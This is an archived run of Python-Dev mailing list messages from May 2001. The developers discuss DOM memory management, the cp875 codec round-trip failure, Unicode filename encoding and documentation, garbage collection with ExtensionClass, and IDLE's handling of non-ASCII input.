Then, every DOM imp that wants to be compatible with xpath/xslt needs to support this interface? node.ownerDocument.implementation.releaseNode(node) or node.py_unlink() > > As a slightly independent question, such a function also ought to > support DOM implementations not known to it; I'm thinking in > particular of the Zope DOMs. I'd like to hear proposals on how such an > interface should work; I see three options: See above > > a) it is an operation on the document node (or any node), as in minidom. > b) it is an operation on the DOM implementation (almost as in 4Suite; > you'd need to navigate from the node to the implementation, then > you'd need a well-known operation on the implementation) > c) the code assumes that no release activity is necessary for unknown > DOMs, effectively believing in reference counting, garbage collection, > acquisition, and other black art. I like either a or b Mike > > Any comments appreciated, in particular > 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and > 2. from authors of other DOMs on a general memory management API for > Python DOM. > > Regards, > Martin > > _______________________________________________ > 4suite mailing list > 4suite at lists.fourthought.com > http://lists.fourthought.com/mailman/listinfo/4suite -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Sun May 13 20:31:42 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 14:31:42 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFEC241.62084286@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > The "right" thing to do here, is to simply remove cp875 > from the test for round-tripping. I'm relieved you think so, since that's what I already did . 
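For readers following the cp875 problem, here is a minimal sketch in modern Python 3 of inverting a decoding map without depending on dict iteration order. The four-entry table is a hypothetical excerpt modelled on the cp875 entries quoted above, not the real cp875 table, and `invert` is an illustrative helper, not part of the codecs package. Code points that several bytes decode to are reported, and are either marked undefined (None) or resolved deterministically to the lowest byte.

```python
from collections import defaultdict

# Hypothetical excerpt: byte value -> Unicode code point, modelled on cp875.
decoding_map = {
    0x003f: 0x001a,  # SUBSTITUTE
    0x00dc: 0x001a,  # SUBSTITUTE
    0x00fd: 0x001a,  # SUBSTITUTE
    0x0041: 0x0041,  # an ordinary one-to-one entry
}


def invert(decoding_map, ambiguous="undefined"):
    """Build an encoding map (code point -> byte) from a decoding map.

    Returns (encoding_map, collisions), where collisions maps every code
    point reached from more than one byte to the sorted list of those bytes.
    ambiguous="undefined" stores None for such code points;
    ambiguous="lowest" keeps the smallest byte value instead.
    """
    sources = defaultdict(list)
    # Sorting the items makes the result independent of dict ordering.
    for byte, code_point in sorted(decoding_map.items()):
        sources[code_point].append(byte)

    encoding_map, collisions = {}, {}
    for code_point, byte_values in sources.items():
        if len(byte_values) > 1:
            collisions[code_point] = byte_values
            if ambiguous == "undefined":
                encoding_map[code_point] = None
                continue
        encoding_map[code_point] = byte_values[0]  # lowest byte; list is sorted
    return encoding_map, collisions


encoding_map, collisions = invert(decoding_map)
print(collisions)  # {26: [63, 220, 253]}
```

Storing None makes the ambiguity visible to whoever consumes the table instead of letting it depend on which entry happened to be inserted last.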
> It is not the only encoding which fails this test, but it's not > our fault: the codecs were all generated from the original codec > maps at the Unicode.org site. > > If their mappings are broken, we can't do much about it... other > than to ignore the error or remove the codec altogether. On general principle I don't like either of those -- "in the face of ambiguity, refuse the temptation to guess". It's at least surprising to see >>> unicode("?", "cp875").encode("cp875") '\xfd' >>> now, yes? Would it be better if an ambiguous encoding raised an exception in "strict" mode? That is, a third choice is to alert users when they're relying on a broken part of a mapping. From martin at loewis.home.cs.tu-berlin.de Sun May 13 21:08:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 21:08:47 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 12:15:46 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> > What if we put these on the implementation, that or came up with a > standard interface on the node. Then, every DOM imp that wants to be > compatible with xpath/xslt needs to support this interface? > > > node.ownerDocument.implementation.releaseNode(node) > > or > > node.py_unlink() releaseNode sounds good to me; it is unlikely that W3C would give an operation that name but a different meaning. Any objections? 
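As a rough illustration of option (b), a generic release helper could look up a releaseNode method on the node's DOM implementation and otherwise do nothing, which amounts to option (c). The Toy* classes and the release_node function are hypothetical stand-ins written for this sketch; they are not minidom, 4DOM or pDomlette APIs.

```python
class ToyImplementation:
    """Stand-in for a DOM implementation that needs explicit cleanup."""

    def __init__(self):
        self.released = []

    def releaseNode(self, node):
        # A real implementation would break parent/child cycles here.
        self.released.append(node)


class ToyDocument:
    def __init__(self, implementation):
        self.implementation = implementation
        self.ownerDocument = None  # as in the DOM, a Document has no owner


class ToyNode:
    def __init__(self, document):
        self.ownerDocument = document


def release_node(node):
    """Dispatch to node.ownerDocument.implementation.releaseNode(node).

    Returns True if a release hook was called, False if the DOM offers
    none (in which case we rely on refcounting / garbage collection).
    """
    document = getattr(node, "ownerDocument", None)
    if document is None:
        document = node  # the node may itself be the Document
    implementation = getattr(document, "implementation", None)
    release = getattr(implementation, "releaseNode", None)
    if release is None:
        return False
    release(node)
    return True


impl = ToyImplementation()
doc = ToyDocument(impl)
node = ToyNode(doc)
release_node(node)
print(len(impl.released))  # 1
```

Callers then need only one entry point, and DOMs that do not need explicit cleanup simply omit the method.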
Regards, Martin From tim.one at home.com Sun May 13 21:45:40 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 15:45:40 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: > http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465& > group_id=5470 > > Category: core (C code) > Group: None > >Status: Closed > >Resolution: Accepted > Priority: 5 > Submitted By: Mark Hammond (mhammond) > Assigned to: Mark Hammond (mhammond) > Summary: Allow pre-encoded strings as filenames > > Initial Comment: > This patch enables most filename parameters to use pre- > encoded strings. On Windows, the default of "mbcs" is > used. On all other platforms, the default filename > encoding is the same as the general default encoding, > which in reality means there is no functional change. > However, other platforms can simply plugin their own > encodings. > ... Mark (or anyone else who understands all this), were doc changes included? Can someone please add a briefer user-oriented blurb to Misc/NEWS too? From tim.one at home.com Sun May 13 22:54:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 16:54:50 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid> Message-ID: [/F] > as a footnote, SRE uses the same source code to generate > both 8-bit and 16-bit versions of the match engine. I see no > reason why we cannot do the same for the string operations > (PyString, PyUnicode, and strop). > > if anyone wants me to look into this, just say "go ahead". go ahead Here's another idea: whenever we fix or extend Python's "%" formats, it requires changes in both stringobject.c and unicodeobject.c, but they've diverged in irritating ways that make it a fresh adventure in each.
In the early days, Python handled % formats pretty much by just building a format string and passing that on to C's sprintf. But as the years have gone by, and the number of buggy platforms increased, Python has taken over more & more of it itself. For example, it doesn't trust sprintf to deal with justification, 0-fill or blank-fill, and needed to grow its own from-scratch code for integer conversion in order to handle Python longs. In addition, it also grew a PyErr_Format() routine as yet another layer of simulating what a safe sprintf-alike should do. Even with all that, we've still got platform bugs due to, e.g., platform %#x and %#o conversion adding base markers when "they shouldn't" (according to C), or not adding them when "they should" (according to Python). All in all, the code would be simpler and quicker now if we left the platform sprintf out of sprintf operations entirely . The only thing we're not simulating ourselves is float->string conversion. Unfortunately, we can't do that without also doing string->float, because platforms vary in the float strings they can read back (e.g., if Python does float->string and produces "Inf" for positive infinity, but uses strtod or atof to read floats back in, it's a x-platform crapshoot whether "Inf" can be read back in). but-in-favor-of-merging-the-code-even-without-that-ly y'rs - tim From tim.one at home.com Sun May 13 23:00:32 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 17:00:32 -0400 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com> Message-ID: [skip at pobox.com] > I (thankfully) gave up even pretending to run Windows recently, so > I can only make a suggestion for others who look into this problem. > Try this: > Change test___all__.check_all so that the except clause reads: > > except ImportError, msg: > > then print out msg when an import fails. You should get the actual > module that failed to import. 
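The same debugging tip, written as a Python 3 sketch (the `except ImportError, msg` form above is Python 2 syntax). `try_import` is a hypothetical helper; `ImportError.name` (Python 3.3 and later) holds the name of the module that could not be loaded, which for the pty case on a platform without termios would be expected to name termios rather than pty.

```python
import importlib


def try_import(module_name):
    """Import module_name; on failure, say which module was actually missing.

    Returns (module, None) on success or (None, message) on failure.
    """
    try:
        return importlib.import_module(module_name), None
    except ImportError as exc:
        # exc.name is the module the import system could not load, which
        # can differ from module_name (e.g. a dependency such as termios).
        return None, f"importing {module_name!r} failed on {exc.name!r}: {exc}"


module, message = try_import("json")
print(module is not None, message)  # True None
```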
Yes, that confirmed termios was the culprit. Thanks! Fixed by adding import termios del termios in pty.py. As the irritated comment before this new code says, this is absurd. since-you're-on-a-roll-how-about-fixing-test_urllib2-too-ly y'rs - tim From guido at digicool.com Mon May 14 00:26:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:26:39 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200." <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com> > > Now, if you are using the 1.4 version of ExtensionClasses you might > > not have the tp_flags field either (I don't know, I can't easily > > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > > even require recompilation to work with Python 2.1. > > I'll attach a copy below of the struct as defined in > pygtk-0.7.0-unstable-dont-use.tar.gz Hmm... I like that filename. :-) > (0.6.6 does not use extension > classes). As you can see, it does not provide tp_flags, but has a > field of tp_xxx4 for it. Sorry, that's what I meant. This is guaranteed to be initialized to 0 (unless a module goes out of its way to put a value in it, in which case they deserve what they get). > That *should* work, except that it also has its 'methods' field where > tp_traverse would go, and its class_flags field where tp_clear would > go. > > Now, you write > > > ExtensionClasses (at least recent versions that worked with 1.5.2) > > contain a copy of the type object up to and including the tp_flags > > field, and the 2.1 code is careful not to use any newer fields > > without first checking the corresponding flag bit. 
> > In this generality, it is apparently not true: Modules/gcmodule.c has, > in delete_garbage, > > if ((clear = op->ob_type->tp_clear) != NULL) { > ... > traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; > (void) traverse(PyObject_FROM_GC(gc), > (visitproc)visit_decref, > NULL); > > which does not check any flags. That still shouldn't cause any > problems, since the Gtk objects should never end up in the GC lists - > but maybe I'm missing something. I agree with your analysis: op here is gotten from a PyGC_Head, so it cannot be a PyExtensionClass instance, so Neil's code should be safe. Objects never have a GC head unless they specifically request it; PyExtensionClass certainly doesn't request a GC head. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:37:44 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:37:44 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400." References: Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com> > As I said earlier: the only advantage would be if it could simplify > things "under the hood" (compared to metaclasses) but could still > provide the same Class semantics (with maybe a "proto" declaration > sneaking its nose in under the tent.) > But I have no immediate idea on how to do that, and it sounds like > you're pretty far along into an implementation already. I don't know how to do it either, but I suspect it wouldn't be easy. > I guess my practical question, which I meant to ask before I got > myself sidetracked into preaching prototypes is: How much of the > existing plumbing (specifically the Don Beaudry hack) can I rely > on in the future for the objective-C/python bridge ? > With BOOST and Zope's extension classes relying on it, can I > assume that it's being extended rather than replaced ? > ( I guess I ought to take a look at the code!
) I'm currently not too concerned with backwards compatibility, and Jim Fulton has proclaimed that he would prefer to get rid of ExtensionClasses (since what I'm building goes way beyond them!), so I'm not sure I can be motivated to support it just for BOOST's sake. There will be a replacement mechanism that will be at least as powerful, and I'm sure that BOOST etc. can be rewritten to use the new mechanism easily. That's what we're planning for Zope. > Guido: did you ever imagine back at that first workshop at NIST > that you and Python would be where you are today ? No way! I knew I was on to something, but I had no idea onto what... I'll always hold on to the T-shirt you made. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:43:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:43:57 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200." <00ca01c0da68$4fc66570$e46940d5@hagrid> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> <00ca01c0da68$4fc66570$e46940d5@hagrid> Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com> > 2.2 is to be released in october, right? I'm sure I could shake > out the remaining bugs in my "stackless SRE" patch until then... Knowing you that means you'd start working on them late September. :-) There's actually a possibility that if my types/classes stuff goes well, Digital Creations will ask for a 2.2 release sooner (e.g. July). This might have an experimental status, e.g. it might not be backwards compatible, but it would be the version required by Zope 2.4. On the other hand, none of that may happen, or that release would be labeled 2.2b1 or something, or Zope 2.4 might come out after October. What I'm trying to say is, please try to fix stackless SRE sooner rather than later!
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:51:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:51:17 -0500 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200." <200105112053.WAA15657@pandora.informatik.hu-berlin.de> References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='äö' > UnicodeError: ASCII encoding error: ordinal not in range(128) This doesn't bother me, because I don't know how to enter such characters with my US keyboard anyway. :-) :-) > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. Yes, this has bitten me once. It was very painful (I lost a few hours worth of writing). In other words, I agree it's a problem! > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. Not me -- unfortunately, there are too many alternatives to IDLE to be able to justify working on it much. > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. Ditto. Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the Python prompt, both on Linux and on Windows 98. It prints as '\xe4\xf6' on both systems. What changed?
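To make the failure mode concrete, here is a small Python 3 sketch (not IDLE code) showing that the same two characters encode cleanly with an explicit codec but fail with ASCII. `encode_report` is a hypothetical helper; encoding 'äö' as Latin-1 gives the bytes \xe4\xf6, the same values printed above.

```python
text = "\u00e4\u00f6"  # the two characters a-umlaut and o-umlaut


def encode_report(s, encoding):
    """Return the encoded bytes, or the codec's error reason if it fails."""
    try:
        return s.encode(encoding)
    except UnicodeEncodeError as exc:
        return exc.reason


print(encode_report(text, "latin-1"))  # b'\xe4\xf6'
print(encode_report(text, "ascii"))    # ordinal not in range(128)
```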
--Guido van Rossum (home page: http://www.python.org/~guido/) From Mike.Olson at fourthought.com Mon May 14 03:02:03 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 19:02:03 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> Message-ID: <3AFF2E8B.31B9ED97@FourThought.com> "Martin v. Loewis" wrote: > > > What if we put these on the implementation, that or came up with a > > standard interface on the node. Then, every DOM imp that wants to be > > compatible with xpath/xslt needs to support this interface? > > > > > > node.ownerDocument.implementation.releaseNode(node) > > > > or > > > > node.py_unlink() > > releaseNode sounds good to me; it is unlikely that W3C would give an > operation that name but a different meaning. Any objections? Should we standardize all of the python xml extensions with a py prefix? pyReleaseNode or py_releaseNode? Then we will never have to worry about a name clash. Mike > > Regards, > Martin -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From MarkH at ActiveState.com Mon May 14 03:37:35 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 11:37:35 +1000 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Tim] > Mark (or anyone else who understands all this), were doc changes included? > Can someone please add a briefer user-oriented blurb to Misc/NEWS too? No problem. Where should the "real" documentation go? It seems maybe we need a new sub-heading under the "6.1 - os -- Misc. OS Interface" - something like: 6.1.x - Unicode and the file system - general discussion. 
- Windows specific - Mac specific should that appear. - OS' with no special support (ie, "the rest") Does that make sense? I have made this change to Misc/NEWS. Does this look OK (obviously once I know what to replace "[????]" with :) And-I-will-do-the-registry-docs-at-the-same-time ly, Mark. Index: NEWS =================================================================== RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v retrieving revision 1.166 diff -r1.166 NEWS 4a5,21 > - Some operating systems now support the concept of a default Unicode > encoding for file system operations. Notably, Windows supports 'mbcs' > as the default. The Macintosh will also adopt this concept in the medium > term, altough the default encoding for that platform will be other than > 'mbcs'. > On operating system that support non-ascii filenames, it is common for > functions that return filenames (such as os.listdir()) to return Python > string objects pre-encoded using the default file system encoding for > the platform. As this encoding is likely to be different from Python's > default encoding, converting this name to a Unicode object before passing > it back to the Operating System would result in a Unicode error, as Python > would attempt to use it's default encoding (generally ASCII) rather > than the default encoding for the file system. > In general, this change simply removes surprises when working with > Unicode and the file system, making these operations work as > you expect, increasing the transparency of Unicode objects in this context. > See [????] for more details, including examples. From tim.one at home.com Mon May 14 04:52:22 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 22:52:22 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Mark Hammond] > ... > Where should the "real" documentation go? It seems maybe we need a > new sub-heading under the "6.1 - os -- Misc. 
OS Interface" - something > like: > > 6.1.x - Unicode and the file system > - general discussion. > - Windows specific > - Mac specific should that appear. > - OS' with no special support (ie, "the rest") > > Does that make sense? So far is it goes, yes. I think the manual desperately needs a Unicode section for other reasons, though: from traffic on c.l.py, it's clear that few people can figure out how to do *anything* with Unicode now unless their first name begins with "M" (Mark, Martin, Marc -- definitely not Skip ). There's no overview and there are no examples. The primary string method doesn't even mention Unicode (here paraphrasing questions that pop up): encode([encoding[,errors]]) Return an encoded version of the string. What does "encoded version" mean? Is that another string? An encoding object of some sort? Etc. Default encoding is the current default string encoding. What's the "current default string encoding"? How can I find out? Can't even guess what *type* it has (string? magic object? little integer?). If I don't want the default encoding, how do I specify a different one? What are the possible values? Again, can't even guess the type of the object that needs to be passed for encoding. errors may be given to set a different error handling scheme. The default for errors is 'strict', meaning that encoding errors raise a ValueError. Other possible values are 'ignore' and 'replace'. So what do 'ignore' and 'replace' mean? There's more left unsaid here than a single example could clarify, but there's not even an example -- so people stare at this wholly uncomprehending. If they stumble into the unicode() builtin function (in a different part of the manual, neither referencing nor referenced by the .encode() method), it's no better: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. What? Hard to even guess what the function returns. Maybe, from the name, a Unicode string? Error handling is done according to errors. 
What? The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. How do encoding errors arise from a function that *de*codes? See also the codecs module. Which helps, but the relationship between the codecs module and the unicode() function isn't spelled out there either. Look up "encoding" in the index, and you get pointers to base64, quoted-printable and the mimetypes module, which only confuses things more. I don't expect you to fix this, I'm trying to get across that the Unicode docs need work even without new gimmicks. If Fred agrees, I'm sure he'll think of a good place to put the new info too. > I have made this change to Misc/NEWS. Does this look OK > (obviously once I know what to replace "[????]" with :) Absolutely, and I don't even have to read it to say so: once *something* is checked in, we're assured it won't get dropped on the floor come release time, and anyone who has any quibbles with it can check in changes. It's not like checking in a NEWS item can break the std test suite or cause HP-UX to crash. well-not-really-sure-about-the-latter-ly y'rs - tim From barry at digicool.com Mon May 14 06:16:18 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 00:16:18 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? References: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: <15103.23570.191115.85137@anthem.wooz.org> >>>>> "FL" == Fredrik Lundh writes: FL> (is Jython using exactly the same hashing and dictionary FL> algorithms as CPython? or does it work by accident also under FL> Jython?) Most likely, it's pure accident. Jython's PyDictionary uses a Java Hashtable underneath, so you're dependent on its behavior. -Barry From esr at thyrsus.com Mon May 14 07:20:17 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 01:20:17 -0400 Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com> A user pointed out a typo in the "Curses Programming with Python" tutorial at . While attempting to fix it, I discovered a few things: 1. Somebody seems to have removed Andrew Kuchling's name from it. If it was Andrew, that's OK -- but the reference in the latest version of the library docs still cites him. 2. I don't seem to have the TeX source anymore. Where can I download it? 3. Perhaps it's time to start putting howtos in the nondist part of the CVS tree? -- Eric S. Raymond Power concedes nothing without a demand. It never did, and it never will. Find out just what people will submit to, and you have found out the exact amount of injustice and wrong which will be imposed upon them; and these will continue until they are resisted with either words or blows, or with both. The limits of tyrants are prescribed by the endurance of those whom they oppress. -- Frederick Douglass, August 4, 1857 From greg at cosc.canterbury.ac.nz Mon May 14 07:36:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 14 May 2001 17:36:49 +1200 (NZST) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl> Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz> Jack Jansen : > MacOS (<= 9) itself doesn't have chdir, because it doesn't believe > in current directories (by design. Well, it does have an equivalent (HSetVol). But it's not used much by Mac software because it's usual to work with full file specifications at all times, at least internally. From martin at loewis.home.cs.tu-berlin.de Mon May 14 07:38:24 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Mon, 14 May 2001 07:38:24 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 19:02:03 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com> Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de> > Should we standardize all of the python xml extensions with a py > prefix? pyReleaseNode or py_releaseNode? Then we will never have to > worry about a name clash. IMO, no. The entire interface together is the Python DOM mapping. In the unlikely event of a name clash, we could still decide to rename the DOM function, or find some other magic (e.g. overloading on the argument count). Regards, Martin From mal at lemburg.com Mon May 14 11:02:19 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:02:19 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3AFF9F1B.A1CDD617@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > The "right" thing to do here, is to simply remove cp875 > > from the test for round-tripping. > > I'm relieved you think so, since that's what I already did . > > > It is not the only encoding which fails this test, but it's not > > our fault: the codecs were all generated from the original codec > > maps at the Unicode.org site. > > > > If their mappings are broken, we can't do much about it... other > > than to ignore the error or remove the codec altogether. > > On general principle I don't like either of those -- "in the face of > ambiguity, refuse the temptation to guess". It's at least surprising to see > > >>> unicode("?", "cp875").encode("cp875") > '\xfd' > >>> > > now, yes? Would it be better if an ambiguous encoding raised an exception in > "strict" mode? 
That is, a third choice is to alert users when they're > relying on a broken part of a mapping. The problem is: which part would raise the exception -- the encoder or the decoder ? Here are some more options: * sort the items before creating the encoding table from the decoding one (makes the mapping stable) * map keys which have multiple mappings in the encoding table to None -- this causes their usage to raise an exception (undefined mapping) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 14 11:15:43 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:15:43 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3AFFA23F.248517E3@lemburg.com> Tim Peters wrote: > > [Mark Hammond] > > ... > > Where should the "real" documentation go? It seems maybe we need a > > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > > like: > > > > 6.1.x - Unicode and the file system > > - general discussion. > > - Windows specific > > - Mac specific should that appear. > > - OS' with no special support (ie, "the rest") > > > > Does that make sense? > > So far is it goes, yes. I think the manual desperately needs a Unicode > section for other reasons, though: from traffic on c.l.py, it's clear that > few people can figure out how to do *anything* with Unicode now unless their > first name begins with "M" (Mark, Martin, Marc -- definitely not Skip > ). There's no overview and there are no examples. The primary string > method doesn't even mention Unicode (here paraphrasing questions that pop > up): > [...] True. The main source of documentation for Unicode still is the proposal itself (Misc/unicode.txt). It needs some reordering and a few examples, but does contain all the information needed to grasp what the implementation intends and how it works. 
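As an example of the kind Tim asks for, this Python 3 sketch exercises the three error-handling schemes named in the quoted docs. `encode_all_ways` is a hypothetical helper. UnicodeEncodeError is a subclass of ValueError, which is consistent with the "raise a ValueError" wording quoted above.

```python
def encode_all_ways(s, encoding="ascii"):
    """Encode s with each standard error handler and collect the outcomes."""
    results = {}
    for errors in ("strict", "ignore", "replace"):
        try:
            results[errors] = s.encode(encoding, errors)
        except UnicodeEncodeError as exc:
            # 'strict' raises instead of returning bytes.
            results[errors] = exc
    return results


outcomes = encode_all_ways("caf\u00e9")  # 'café'
print(outcomes["ignore"], outcomes["replace"])  # b'caf' b'caf?'

# Decoding uses the same handler names; 'replace' inserts U+FFFD.
print(b"caf\xe9".decode("utf-8", "replace") == "caf\ufffd")  # True
```

'ignore' silently drops the unencodable character, while 'replace' leaves a visible marker, which is usually easier to debug.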
If that's still not enough, there are numerous doc-strings in the codecs.py module, more technical docs in the API reference and finally the unicodeobject.h header file itself. Another source for documentation and examples is the i18n-sig page on python.org. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Mon May 14 11:55:26 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 14 May 2001 11:55:26 +0200 Subject: [Python-Dev] Py_FileSystemDefaultEncoding Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl> I'm not too thrilled with the way the filename encoding stuff was done, with a global var declared in posixmodule.c which is then used by bltinmodule.c. It took me quite a while to figure out why my builds were failing, and how to fix it. And I think other minority platforms may have the same problem, so maybe it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an include file, and do the initialization in a more "common" place? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From fredrik at pythonware.com Mon May 14 12:18:49 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Mon, 14 May 2001 12:18:49 +0200 Subject: [Python-Dev] State of curses tutorial? References: <20010514012017.A6971@thyrsus.com> Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff> eric wrote: > > 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it > was Andrew, that's OK -- but the reference in the latest version of the > library docs still cites him. that would be either you (who reworked the document), or andrew (who checked in your changes). 
looks like fred has already fixed it: Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake Use appropriate markup for multiple authors; LaTeX's \author is not additive; the second occurrance was causing the first author to be dropped. > 2. I don't seem to have the TeX source anymore. Where can I download it? it's in the py-howto CVS tree: http://sourceforge.net/projects/py-howto Cheers /F From loewis at informatik.hu-berlin.de Mon May 14 13:29:21 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:29:21 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com> Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de> > I have a bug report assigned to myself which indicates similar > problems with _tkinter and Tk/Tcl. There were other problem > reports on the German Python mailing list going in the same > direction too. > > The basic problem seems to be that Tk/Tcl applies too much > magic to the text widget contents in order to find out the > used encoding and this can easily cause the whole encoding > mechanism to fail. This is actually a different problem. In this scenario here, the user types a non-ASCII character into a text widget, then _tkinter returns a Unicode object (IMO rightfully so). In the other problem, the Python program puts a byte string into a text widget, the user enters some more characters, and _tkinter returns a byte string which does not follow any encoding. > A Tk/Tcl expert should really look into this and fix _tkinter.c > to aid Tk/Tcl in not mixing up the encodings (e.g. it would > probably be a good idea to recode Python 8bit-strings into > whatever encoding Tk/Tcl assumes as default). Again, this is not the issue here: Both _tkinter and Tk behave absolutely correctly IMO.
